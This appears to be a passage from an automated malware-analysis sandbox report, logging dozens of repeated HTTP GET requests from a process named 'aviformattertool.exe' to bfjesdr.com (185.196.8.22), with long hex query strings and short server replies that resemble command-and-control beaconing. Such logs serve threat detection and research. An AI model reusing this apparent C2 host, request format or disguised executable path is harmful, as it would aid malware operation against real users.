                                                                                                                                                        Jan 13, 2024 06:33:25.372836113 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:25 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        38192.168.2.449776185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:25.681452990 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:25.897917986 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:25 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20
                                                                                                                                                        Jan 13, 2024 06:33:26.015897989 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:26.237591982 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:26 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        39192.168.2.449777185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:26.546508074 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:26.762892962 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:26 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        40192.168.2.449778185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:27.072328091 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:27.294039011 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:27 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        41192.168.2.449779185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:27.603542089 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:27.820477962 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:27 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20
                                                                                                                                                        Jan 13, 2024 06:33:27.931664944 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:28.153575897 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:28 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        42192.168.2.449780185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:28.463033915 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:28.680557013 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:28 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20
                                                                                                                                                        Jan 13, 2024 06:33:28.793498993 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:29.010036945 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:28 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        43192.168.2.449781185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:29.322546005 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:29.543780088 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:29 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        44192.168.2.449782185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:29.861105919 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:30.078883886 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:29 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        45192.168.2.449783185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:30.385277033 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:30.607637882 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:30 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        46192.168.2.449784185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:30.916450024 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:31.138622999 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:31 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        47192.168.2.449785185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:31.448833942 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:31.665730953 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:31 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20
                                                                                                                                                        Jan 13, 2024 06:33:31.777925968 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:31.994685888 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:31 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        48192.168.2.449786185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:32.309164047 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:32.530930996 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:32 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        49192.168.2.449787185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:32.838264942 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:33.055308104 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:32 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        50192.168.2.449788185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:33.354623079 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:33.575634956 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:33 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        51192.168.2.449789185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:33.889100075 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:34.114600897 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:34 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        52192.168.2.449790185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:34.419281006 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:34.637278080 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:34 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        53192.168.2.449791185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:34.993797064 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:35.214732885 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:35 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        54192.168.2.449792185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:36.978112936 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:37.200464964 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:37 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        55192.168.2.449793185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:37.510318041 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:37.727576971 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:37 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
